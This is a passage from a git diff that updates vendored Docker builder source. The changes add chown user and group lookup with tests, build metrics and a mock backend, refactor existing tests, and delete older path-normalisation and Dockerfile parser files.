+	return chownPair, nil
+}
+
+func lookupUser(userStr, filepath string) (int, error) {
+	// if the string is actually a uid integer, parse to int and return
+	// as we don't need to translate with the help of files
+	uid, err := strconv.Atoi(userStr)
+	if err == nil {
+		return uid, nil
+	}
+	users, err := lcUser.ParsePasswdFileFilter(filepath, func(u lcUser.User) bool {
+		return u.Name == userStr
+	})
+	if err != nil {
+		return 0, err
+	}
+	if len(users) == 0 {
+		return 0, errors.New("no such user: " + userStr)
+	}
+	return users[0].Uid, nil
+}
+
+func lookupGroup(groupStr, filepath string) (int, error) {
+	// if the string is actually a gid integer, parse to int and return
+	// as we don't need to translate with the help of files
+	gid, err := strconv.Atoi(groupStr)
+	if err == nil {
+		return gid, nil
+	}
+	groups, err := lcUser.ParseGroupFileFilter(filepath, func(g lcUser.Group) bool {
+		return g.Name == groupStr
+	})
+	if err != nil {
+		return 0, err
+	}
+	if len(groups) == 0 {
+		return 0, errors.New("no such group: " + groupStr)
+	}
+	return groups[0].Gid, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go
new file mode 100644
index 0000000000..1b3a99893a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go
@@ -0,0 +1,138 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/pkg/idtools"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestChownFlagParsing(t *testing.T) {
+	testFiles := map[string]string{
+		"passwd": `root:x:0:0::/bin:/bin/false
+bin:x:1:1::/bin:/bin/false
+wwwwww:x:21:33::/bin:/bin/false
+unicorn:x:1001:1002::/bin:/bin/false
+		`,
+		"group": `root:x:0:
+bin:x:1:
+wwwwww:x:33:
+unicorn:x:1002:
+somegrp:x:5555:
+othergrp:x:6666:
+		`,
+	}
+	// test mappings for validating use of maps
+	idMaps := []idtools.IDMap{
+		{
+			ContainerID: 0,
+			HostID:      100000,
+			Size:        65536,
+		},
+	}
+	remapped := idtools.NewIDMappingsFromMaps(idMaps, idMaps)
+	unmapped := &idtools.IDMappings{}
+
+	contextDir, cleanup := createTestTempDir(t, "", "builder-chown-parse-test")
+	defer cleanup()
+
+	if err := os.Mkdir(filepath.Join(contextDir, "etc"), 0755); err != nil {
+		t.Fatalf("error creating test directory: %v", err)
+	}
+
+	for filename, content := range testFiles {
+		createTestTempFile(t, filepath.Join(contextDir, "etc"), filename, content, 0644)
+	}
+
+	// positive tests
+	for _, testcase := range []struct {
+		name      string
+		chownStr  string
+		idMapping *idtools.IDMappings
+		expected  idtools.IDPair
+	}{
+		{
+			name:      "UIDNoMap",
+			chownStr:  "1",
+			idMapping: unmapped,
+			expected:  idtools.IDPair{UID: 1, GID: 1},
+		},
+		{
+			name:      "UIDGIDNoMap",
+			chownStr:  "0:1",
+			idMapping: unmapped,
+			expected:  idtools.IDPair{UID: 0, GID: 1},
+		},
+		{
+			name:      "UIDWithMap",
+			chownStr:  "0",
+			idMapping: remapped,
+			expected:  idtools.IDPair{UID: 100000, GID: 100000},
+		},
+		{
+			name:      "UIDGIDWithMap",
+			chownStr:  "1:33",
+			idMapping: remapped,
+			expected:  idtools.IDPair{UID: 100001, GID: 100033},
+		},
+		{
+			name:      "UserNoMap",
+			chownStr:  "bin:5555",
+			idMapping: unmapped,
+			expected:  idtools.IDPair{UID: 1, GID: 5555},
+		},
+		{
+			name:      "GroupWithMap",
+			chownStr:  "0:unicorn",
+			idMapping: remapped,
+			expected:  idtools.IDPair{UID: 100000, GID: 101002},
+		},
+		{
+			name:      "UserOnlyWithMap",
+			chownStr:  "unicorn",
+			idMapping: remapped,
+			expected:  idtools.IDPair{UID: 101001, GID: 101002},
+		},
+	} {
+		t.Run(testcase.name, func(t *testing.T) {
+			idPair, err := parseChownFlag(testcase.chownStr, contextDir, testcase.idMapping)
+			assert.NilError(t, err, "Failed to parse chown flag: %q", testcase.chownStr)
+			assert.Check(t, is.DeepEqual(testcase.expected, idPair), "chown flag mapping failure")
+		})
+	}
+
+	// error tests
+	for _, testcase := range []struct {
+		name      string
+		chownStr  string
+		idMapping *idtools.IDMappings
+		descr     string
+	}{
+		{
+			name:      "BadChownFlagFormat",
+			chownStr:  "bob:1:555",
+			idMapping: unmapped,
+			descr:     "invalid chown string format: bob:1:555",
+		},
+		{
+			name:      "UserNoExist",
+			chownStr:  "bob",
+			idMapping: unmapped,
+			descr:     "can't find uid for user bob: no such user: bob",
+		},
+		{
+			name:      "GroupNoExist",
+			chownStr:  "root:bob",
+			idMapping: unmapped,
+			descr:     "can't find gid for group bob: no such group: bob",
+		},
+	} {
+		t.Run(testcase.name, func(t *testing.T) {
+			_, err := parseChownFlag(testcase.chownStr, contextDir, testcase.idMapping)
+			assert.Check(t, is.Error(err, testcase.descr), "Expected error string doesn't match")
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go
index d170d8e25a..1c34fd3871 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go
@@ -1,13 +1,21 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
 	"fmt"
-	"strings"
+	"os"
+	"runtime"
 	"testing"
 
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/remotecontext"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/go-connections/nat"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
 )
 
 func TestEmptyDockerfile(t *testing.T) {
@@ -16,7 +24,7 @@ func TestEmptyDockerfile(t *testing.T) {
 
 	createTestTempFile(t, contextDir, builder.DefaultDockerfileName, "", 0777)
 
-	readAndCheckDockerfile(t, "emptyDockefile", contextDir, "", "The Dockerfile (Dockerfile) cannot be empty")
+	readAndCheckDockerfile(t, "emptyDockerfile", contextDir, "", "the Dockerfile (Dockerfile) cannot be empty")
 }
 
 func TestSymlinkDockerfile(t *testing.T) {
@@ -38,7 +46,7 @@ func TestDockerfileOutsideTheBuildContext(t *testing.T) {
 	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerfile-test")
 	defer cleanup()
 
-	expectedError := "Forbidden path outside the build context"
+	expectedError := "Forbidden path outside the build context: ../../Dockerfile ()"
 
 	readAndCheckDockerfile(t, "DockerfileOutsideTheBuildContext", contextDir, "../../Dockerfile", expectedError)
 }
@@ -53,11 +61,9 @@ func TestNonExistingDockerfile(t *testing.T) {
 }
 
 func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath, expectedError string) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
-
-	if err != nil {
-		t.Fatalf("Error when creating tar stream: %s", err)
-	}
+	assert.NilError(t, err)
 
 	defer func() {
 		if err = tarStream.Close(); err != nil {
@@ -65,31 +71,103 @@ func readAndCheckDockerfile(t *testing.T, testName, contextDir, dockerfilePath,
 		}
 	}()
 
-	context, err := builder.MakeTarSumContext(tarStream)
-
-	if err != nil {
-		t.Fatalf("Error when creating tar context: %s", err)
+	if dockerfilePath == "" { // handled in BuildWithContext
+		dockerfilePath = builder.DefaultDockerfileName
 	}
 
-	defer func() {
-		if err = context.Close(); err != nil {
-			t.Fatalf("Error when closing tar context: %s", err)
-		}
-	}()
+	config := backend.BuildConfig{
+		Options: &types.ImageBuildOptions{Dockerfile: dockerfilePath},
+		Source:  tarStream,
+	}
+	_, _, err = remotecontext.Detect(config)
+	assert.Check(t, is.Error(err, expectedError))
+}
 
-	options := &types.ImageBuildOptions{
-		Dockerfile: dockerfilePath,
+func TestCopyRunConfig(t *testing.T) {
+	defaultEnv := []string{"foo=1"}
+	defaultCmd := []string{"old"}
+
+	var testcases = []struct {
+		doc       string
+		modifiers []runConfigModifier
+		expected  *container.Config
+	}{
+		{
+			doc:       "Set the command",
+			modifiers: []runConfigModifier{withCmd([]string{"new"})},
+			expected: &container.Config{
+				Cmd: []string{"new"},
+				Env: defaultEnv,
+			},
+		},
+		{
+			doc:       "Set the command to a comment",
+			modifiers: []runConfigModifier{withCmdComment("comment", runtime.GOOS)},
+			expected: &container.Config{
+				Cmd: append(defaultShellForOS(runtime.GOOS), "#(nop) ", "comment"),
+				Env: defaultEnv,
+			},
+		},
+		{
+			doc: "Set the command and env",
+			modifiers: []runConfigModifier{
+				withCmd([]string{"new"}),
+				withEnv([]string{"one", "two"}),
+			},
+			expected: &container.Config{
+				Cmd: []string{"new"},
+				Env: []string{"one", "two"},
+			},
+		},
 	}
 
-	b := &Builder{options: options, context: context}
+	for _, testcase := range testcases {
+		runConfig := &container.Config{
+			Cmd: defaultCmd,
+			Env: defaultEnv,
+		}
+		runConfigCopy := copyRunConfig(runConfig, testcase.modifiers...)
+		assert.Check(t, is.DeepEqual(testcase.expected, runConfigCopy), testcase.doc)
+		// Assert the original was not modified
+		assert.Check(t, runConfig != runConfigCopy, testcase.doc)
+	}
 
-	err = b.readDockerfile()
+}
 
-	if err == nil {
-		t.Fatalf("No error when executing test: %s", testName)
+func fullMutableRunConfig() *container.Config {
+	return &container.Config{
+		Cmd: []string{"command", "arg1"},
+		Env: []string{"env1=foo", "env2=bar"},
+		ExposedPorts: nat.PortSet{
+			"1000/tcp": {},
+			"1001/tcp": {},
+		},
+		Volumes: map[string]struct{}{
+			"one": {},
+			"two": {},
+		},
+		Entrypoint: []string{"entry", "arg1"},
+		OnBuild:    []string{"first", "next"},
+		Labels: map[string]string{
+			"label1": "value1",
+			"label2": "value2",
+		},
+		Shell: []string{"shell", "-c"},
 	}
+}
 
-	if !strings.Contains(err.Error(), expectedError) {
-		t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", expectedError, err.Error())
-	}
+func TestDeepCopyRunConfig(t *testing.T) {
+	runConfig := fullMutableRunConfig()
+	copy := copyRunConfig(runConfig)
+	assert.Check(t, is.DeepEqual(fullMutableRunConfig(), copy))
+
+	copy.Cmd[1] = "arg2"
+	copy.Env[1] = "env2=new"
+	copy.ExposedPorts["10002"] = struct{}{}
+	copy.Volumes["three"] = struct{}{}
+	copy.Entrypoint[1] = "arg2"
+	copy.OnBuild[0] = "start"
+	copy.Labels["label3"] = "value3"
+	copy.Shell[0] = "sh"
+	assert.Check(t, is.DeepEqual(fullMutableRunConfig(), runConfig))
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go
deleted file mode 100644
index a8a47c3582..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go
+++ /dev/null
@@ -1,38 +0,0 @@
-// +build !windows
-
-package dockerfile
-
-import (
-	"os"
-	"path/filepath"
-	"strings"
-
-	"github.com/docker/docker/pkg/system"
-)
-
-// normaliseDest normalises the destination of a COPY/ADD command in a
-// platform semantically consistent way.
-func normaliseDest(cmdName, workingDir, requested string) (string, error) {
-	dest := filepath.FromSlash(requested)
-	endsInSlash := strings.HasSuffix(requested, string(os.PathSeparator))
-	if !system.IsAbs(requested) {
-		dest = filepath.Join(string(os.PathSeparator), filepath.FromSlash(workingDir), dest)
-		// Make sure we preserve any trailing slash
-		if endsInSlash {
-			dest += string(os.PathSeparator)
-		}
-	}
-	return dest, nil
-}
-
-func containsWildcards(name string) bool {
-	for i := 0; i < len(name); i++ {
-		ch := name[i]
-		if ch == '\\' {
-			i++
-		} else if ch == '*' || ch == '?' || ch == '[' {
-			return true
-		}
-	}
-	return false
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go
index f60b112049..26978b48cf 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows.go
@@ -1,66 +1,7 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-	"strings"
+import "github.com/docker/docker/pkg/idtools"
 
-	"github.com/docker/docker/pkg/system"
-)
-
-// normaliseDest normalises the destination of a COPY/ADD command in a
-// platform semantically consistent way.
-func normaliseDest(cmdName, workingDir, requested string) (string, error) {
-	dest := filepath.FromSlash(requested)
-	endsInSlash := strings.HasSuffix(dest, string(os.PathSeparator))
-
-	// We are guaranteed that the working directory is already consistent,
-	// However, Windows also has, for now, the limitation that ADD/COPY can
-	// only be done to the system drive, not any drives that might be present
-	// as a result of a bind mount.
-	//
-	// So... if the path requested is Linux-style absolute (/foo or \\foo),
-	// we assume it is the system drive. If it is a Windows-style absolute
-	// (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we
-	// strip any configured working directories drive letter so that it
-	// can be subsequently legitimately converted to a Windows volume-style
-	// pathname.
-
-	// Not a typo - filepath.IsAbs, not system.IsAbs on this next check as
-	// we only want to validate where the DriveColon part has been supplied.
-	if filepath.IsAbs(dest) {
-		if strings.ToUpper(string(dest[0])) != "C" {
-			return "", fmt.Errorf("Windows does not support %s with a destinations not on the system drive (C:)", cmdName)
-		}
-		dest = dest[2:] // Strip the drive letter
-	}
-
-	// Cannot handle relative where WorkingDir is not the system drive.
-	if len(workingDir) > 0 {
-		if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) {
-			return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir)
-		}
-		if !system.IsAbs(dest) {
-			if string(workingDir[0]) != "C" {
-				return "", fmt.Errorf("Windows does not support %s with relative paths when WORKDIR is not the system drive", cmdName)
-			}
-			dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest)
-			// Make sure we preserve any trailing slash
-			if endsInSlash {
-				dest += string(os.PathSeparator)
-			}
-		}
-	}
-	return dest, nil
-}
-
-func containsWildcards(name string) bool {
-	for i := 0; i < len(name); i++ {
-		ch := name[i]
-		if ch == '*' || ch == '?' || ch == '[' {
-			return true
-		}
-	}
-	return false
+func parseChownFlag(chown, ctrRootPath string, idMappings *idtools.IDMappings) (idtools.IDPair, error) {
+	return idMappings.RootPair(), nil
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go
index 868a6671a3..4f00623404 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_windows_test.go
@@ -1,17 +1,23 @@
 // +build windows
 
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
-import "testing"
+import (
+	"fmt"
+	"testing"
 
-func TestNormaliseDest(t *testing.T) {
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestNormalizeDest(t *testing.T) {
 	tests := []struct{ current, requested, expected, etext string }{
-		{``, `D:\`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`},
-		{``, `e:/`, ``, `Windows does not support TEST with a destinations not on the system drive (C:)`},
+		{``, `D:\`, ``, `Windows does not support destinations not on the system drive (C:)`},
+		{``, `e:/`, ``, `Windows does not support destinations not on the system drive (C:)`},
 		{`invalid`, `./c1`, ``, `Current WorkingDir invalid is not platform consistent`},
 		{`C:`, ``, ``, `Current WorkingDir C: is not platform consistent`},
 		{`C`, ``, ``, `Current WorkingDir C is not platform consistent`},
-		{`D:\`, `.`, ``, "Windows does not support TEST with relative paths when WORKDIR is not the system drive"},
+		{`D:\`, `.`, ``, "Windows does not support relative paths when WORKDIR is not the system drive"},
 		{``, `D`, `D`, ``},
 		{``, `./a1`, `.\a1`, ``},
 		{``, `.\b1`, `.\b1`, ``},
@@ -32,20 +38,16 @@ func TestNormaliseDest(t *testing.T) {
 		{`C:\wdm`, `foo/bar/`, `\wdm\foo\bar\`, ``},
 		{`C:\wdn`, `foo\bar/`, `\wdn\foo\bar\`, ``},
 	}
-	for _, i := range tests {
-		got, err := normaliseDest("TEST", i.current, i.requested)
-		if err != nil && i.etext == "" {
-			t.Fatalf("TestNormaliseDest Got unexpected error %q for %s %s. ", err.Error(), i.current, i.requested)
-		}
-		if i.etext != "" && ((err == nil) || (err != nil && err.Error() != i.etext)) {
-			if err == nil {
-				t.Fatalf("TestNormaliseDest Expected an error for %s %s but didn't get one", i.current, i.requested)
-			} else {
-				t.Fatalf("TestNormaliseDest Wrong error text for %s %s - %s", i.current, i.requested, err.Error())
+	for _, testcase := range tests {
+		msg := fmt.Sprintf("Input: %s, %s", testcase.current, testcase.requested)
+		actual, err := normalizeDest(testcase.current, testcase.requested, "windows")
+		if testcase.etext == "" {
+			if !assert.Check(t, err, msg) {
+				continue
 			}
-		}
-		if i.etext == "" && got != i.expected {
-			t.Fatalf("TestNormaliseDest Expected %q for %q and %q. Got %q", i.expected, i.current, i.requested, got)
+			assert.Check(t, is.Equal(testcase.expected, actual), msg)
+		} else {
+			assert.Check(t, is.ErrorContains(err, testcase.etext))
 		}
 	}
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/metrics.go b/vendor/github.com/docker/docker/builder/dockerfile/metrics.go
new file mode 100644
index 0000000000..ceafa7ad62
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/metrics.go
@@ -0,0 +1,44 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"github.com/docker/go-metrics"
+)
+
+var (
+	buildsTriggered metrics.Counter
+	buildsFailed    metrics.LabeledCounter
+)
+
+// Build metrics prometheus messages, these values must be initialized before
+// using them. See the example below in the "builds_failed" metric definition.
+const (
+	metricsDockerfileSyntaxError        = "dockerfile_syntax_error"
+	metricsDockerfileEmptyError         = "dockerfile_empty_error"
+	metricsCommandNotSupportedError     = "command_not_supported_error"
+	metricsErrorProcessingCommandsError = "error_processing_commands_error"
+	metricsBuildTargetNotReachableError = "build_target_not_reachable_error"
+	metricsMissingOnbuildArgumentsError = "missing_onbuild_arguments_error"
+	metricsUnknownInstructionError      = "unknown_instruction_error"
+	metricsBuildCanceled                = "build_canceled"
+)
+
+func init() {
+	buildMetrics := metrics.NewNamespace("builder", "", nil)
+
+	buildsTriggered = buildMetrics.NewCounter("builds_triggered", "Number of triggered image builds")
+	buildsFailed = buildMetrics.NewLabeledCounter("builds_failed", "Number of failed image builds", "reason")
+	for _, r := range []string{
+		metricsDockerfileSyntaxError,
+		metricsDockerfileEmptyError,
+		metricsCommandNotSupportedError,
+		metricsErrorProcessingCommandsError,
+		metricsBuildTargetNotReachableError,
+		metricsMissingOnbuildArgumentsError,
+		metricsUnknownInstructionError,
+		metricsBuildCanceled,
+	} {
+		buildsFailed.WithValues(r)
+	}
+
+	metrics.Register(buildMetrics)
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go b/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go
new file mode 100644
index 0000000000..45cba00a8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go
@@ -0,0 +1,148 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"runtime"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	containerpkg "github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/containerfs"
+)
+
+// MockBackend implements the builder.Backend interface for unit testing
+type MockBackend struct {
+	containerCreateFunc func(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error)
+	commitFunc          func(backend.CommitConfig) (image.ID, error)
+	getImageFunc        func(string) (builder.Image, builder.ROLayer, error)
+	makeImageCacheFunc  func(cacheFrom []string) builder.ImageCache
+}
+
+func (m *MockBackend) ContainerAttachRaw(cID string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool, attached chan struct{}) error {
+	return nil
+}
+
+func (m *MockBackend) ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) {
+	if m.containerCreateFunc != nil {
+		return m.containerCreateFunc(config)
+	}
+	return container.ContainerCreateCreatedBody{}, nil
+}
+
+func (m *MockBackend) ContainerRm(name string, config *types.ContainerRmConfig) error {
+	return nil
+}
+
+func (m *MockBackend) CommitBuildStep(c backend.CommitConfig) (image.ID, error) {
+	if m.commitFunc != nil {
+		return m.commitFunc(c)
+	}
+	return "", nil
+}
+
+func (m *MockBackend) ContainerKill(containerID string, sig uint64) error {
+	return nil
+}
+
+func (m *MockBackend) ContainerStart(containerID string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error {
+	return nil
+}
+
+func (m *MockBackend) ContainerWait(ctx context.Context, containerID string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error) {
+	return nil, nil
+}
+
+func (m *MockBackend) ContainerCreateWorkdir(containerID string) error {
+	return nil
+}
+
+func (m *MockBackend) CopyOnBuild(containerID string, destPath string, srcRoot string, srcPath string, decompress bool) error {
+	return nil
+}
+
+func (m *MockBackend) GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (builder.Image, builder.ROLayer, error) {
+	if m.getImageFunc != nil {
+		return m.getImageFunc(refOrID)
+	}
+
+	return &mockImage{id: "theid"}, &mockLayer{}, nil
+}
+
+func (m *MockBackend) MakeImageCache(cacheFrom []string) builder.ImageCache {
+	if m.makeImageCacheFunc != nil {
+		return m.makeImageCacheFunc(cacheFrom)
+	}
+	return nil
+}
+
+func (m *MockBackend) CreateImage(config []byte, parent string) (builder.Image, error) {
+	return nil, nil
+}
+
+type mockImage struct {
+	id     string
+	config *container.Config
+}
+
+func (i *mockImage) ImageID() string {
+	return i.id
+}
+
+func (i *mockImage) RunConfig() *container.Config {
+	return i.config
+}
+
+func (i *mockImage) OperatingSystem() string {
+	return runtime.GOOS
+}
+
+func (i *mockImage) MarshalJSON() ([]byte, error) {
+	type rawImage mockImage
+	return json.Marshal(rawImage(*i))
+}
+
+type mockImageCache struct {
+	getCacheFunc func(parentID string, cfg *container.Config) (string, error)
+}
+
+func (mic *mockImageCache) GetCache(parentID string, cfg *container.Config) (string, error) {
+	if mic.getCacheFunc != nil {
+		return mic.getCacheFunc(parentID, cfg)
+	}
+	return "", nil
+}
+
+type mockLayer struct{}
+
+func (l *mockLayer) Release() error {
+	return nil
+}
+
+func (l *mockLayer) NewRWLayer() (builder.RWLayer, error) {
+	return &mockRWLayer{}, nil
+}
+
+func (l *mockLayer) DiffID() layer.DiffID {
+	return layer.DiffID("abcdef")
+}
+
+type mockRWLayer struct {
+}
+
+func (l *mockRWLayer) Release() error {
+	return nil
+}
+
+func (l *mockRWLayer) Commit() (builder.ROLayer, error) {
+	return nil, nil
+}
+
+func (l *mockRWLayer) Root() containerfs.ContainerFS {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go
deleted file mode 100644
index fff3046fd3..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"os"
-
-	"github.com/docker/docker/builder/dockerfile/parser"
-)
-
-func main() {
-	var f *os.File
-	var err error
-
-	if len(os.Args) < 2 {
-		fmt.Println("please supply filename(s)")
-		os.Exit(1)
-	}
-
-	for _, fn := range os.Args[1:] {
-		f, err = os.Open(fn)
-		if err != nil {
-			panic(err)
-		}
-		defer f.Close()
-
-		d := parser.Directive{LookingForDirectives: true}
-		parser.SetEscapeToken(parser.DefaultEscapeToken, &d)
-
-		ast, err := parser.Parse(f, &d)
-		if err != nil {
-			panic(err)
-		} else {
-			fmt.Println(ast.Dump())
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go
deleted file mode 100644
index 60d74d9c36..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go
+++ /dev/null
@@ -1,61 +0,0 @@
-package parser
-
-import (
-	"testing"
-)
-
-var invalidJSONArraysOfStrings = []string{
-	`["a",42,"b"]`,
-	`["a",123.456,"b"]`,
-	`["a",{},"b"]`,
-	`["a",{"c": "d"},"b"]`,
-	`["a",["c"],"b"]`,
-	`["a",true,"b"]`,
-	`["a",false,"b"]`,
-	`["a",null,"b"]`,
-}
-
-var validJSONArraysOfStrings = map[string][]string{
-	`[]`:           {},
-	`[""]`:         {""},
-	`["a"]`:        {"a"},
-	`["a","b"]`:    {"a", "b"},
-	`[ "a", "b" ]`: {"a", "b"},
-	`[	"a",	"b"	]`: {"a", "b"},
-	`	[	"a",	"b"	]	`: {"a", "b"},
-	`["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]`: {"abc 123", "♥", "☃", "\" \\ / \b \f \n \r \t \u0000"},
-}
-
-func TestJSONArraysOfStrings(t *testing.T) {
-	for json, expected := range validJSONArraysOfStrings {
-		d := Directive{}
-		SetEscapeToken(DefaultEscapeToken, &d)
-
-		if node, _, err := parseJSON(json, &d); err != nil {
-			t.Fatalf("%q should be a valid JSON array of strings, but wasn't! (err: %q)", json, err)
-		} else {
-			i := 0
-			for node != nil {
-				if i >= len(expected) {
-					t.Fatalf("expected result is shorter than parsed result (%d vs %d+) in %q", len(expected), i+1, json)
-				}
-				if node.Value != expected[i] {
-					t.Fatalf("expected %q (not %q) in %q at pos %d", expected[i], node.Value, json, i)
-				}
-				node = node.Next
-				i++
-			}
-			if i != len(expected) {
-				t.Fatalf("expected result is longer than parsed result (%d vs %d) in %q", len(expected), i+1, json)
-			}
-		}
-	}
-	for _, json := range invalidJSONArraysOfStrings {
-		d := Directive{}
-		SetEscapeToken(DefaultEscapeToken, &d)
-
-		if _, _, err := parseJSON(json, &d); err != errDockerfileNotStringArray {
-			t.Fatalf("%q should be an invalid JSON array of strings, but wasn't!", json)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go
deleted file mode 100644
index d2bf2b01b1..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go
+++ /dev/null
@@ -1,361 +0,0 @@
-package parser
-
-// line parsers are dispatch calls that parse a single unit of text into a
-// Node object which contains the whole statement. Dockerfiles have varied
-// (but not usually unique, see ONBUILD for a unique example) parsing rules
-// per-command, and these unify the processing in a way that makes it
-// manageable.
-
-import (
-	"encoding/json"
-	"errors"
-	"fmt"
-	"strings"
-	"unicode"
-	"unicode/utf8"
-)
-
-var (
-	errDockerfileNotStringArray = errors.New("When using JSON array syntax, arrays must be comprised of strings only.")
-)
-
-// ignore the current argument. This will still leave a command parsed, but
-// will not incorporate the arguments into the ast.
-func parseIgnore(rest string, d *Directive) (*Node, map[string]bool, error) {
-	return &Node{}, nil, nil
-}
-
-// used for onbuild. Could potentially be used for anything that represents a
-// statement with sub-statements.
-//
-// ONBUILD RUN foo bar -> (onbuild (run foo bar))
-//
-func parseSubCommand(rest string, d *Directive) (*Node, map[string]bool, error) {
-	if rest == "" {
-		return nil, nil, nil
-	}
-
-	_, child, err := ParseLine(rest, d, false)
-	if err != nil {
-		return nil, nil, err
-	}
-
-	return &Node{Children: []*Node{child}}, nil, nil
-}
-
-// helper to parse words (i.e space delimited or quoted strings) in a statement.
-// The quotes are preserved as part of this function and they are stripped later
-// as part of processWords().
-func parseWords(rest string, d *Directive) []string {
-	const (
-		inSpaces = iota // looking for start of a word
-		inWord
-		inQuote
-	)
-
-	words := []string{}
-	phase := inSpaces
-	word := ""
-	quote := '\000'
-	blankOK := false
-	var ch rune
-	var chWidth int
-
-	for pos := 0; pos <= len(rest); pos += chWidth {
-		if pos != len(rest) {
-			ch, chWidth = utf8.DecodeRuneInString(rest[pos:])
-		}
-
-		if phase == inSpaces { // Looking for start of word
-			if pos == len(rest) { // end of input
-				break
-			}
-			if unicode.IsSpace(ch) { // skip spaces
-				continue
-			}
-			phase = inWord // found it, fall through
-		}
-		if (phase == inWord || phase == inQuote) && (pos == len(rest)) {
-			if blankOK || len(word) > 0 {
-				words = append(words, word)
-			}
-			break
-		}
-		if phase == inWord {
-			if unicode.IsSpace(ch) {
-				phase = inSpaces
-				if blankOK || len(word) > 0 {
-					words = append(words, word)
-				}
-				word = ""
-				blankOK = false
-				continue
-			}
-			if ch == '\'' || ch == '"' {
-				quote = ch
-				blankOK = true
-				phase = inQuote
-			}
-			if ch == d.EscapeToken {
-				if pos+chWidth == len(rest) {
-					continue // just skip an escape token at end of line
-				}
-				// If we're not quoted and we see an escape token, then always just
-				// add the escape token plus the char to the word, even if the char
-				// is a quote.
-				word += string(ch)
-				pos += chWidth
-				ch, chWidth = utf8.DecodeRuneInString(rest[pos:])
-			}
-			word += string(ch)
-			continue
-		}
-		if phase == inQuote {
-			if ch == quote {
-				phase = inWord
-			}
-			// The escape token is special except for ' quotes - can't escape anything for '
-			if ch == d.EscapeToken && quote != '\'' {
-				if pos+chWidth == len(rest) {
-					phase = inWord
-					continue // just skip the escape token at end
-				}
-				pos += chWidth
-				word += string(ch)
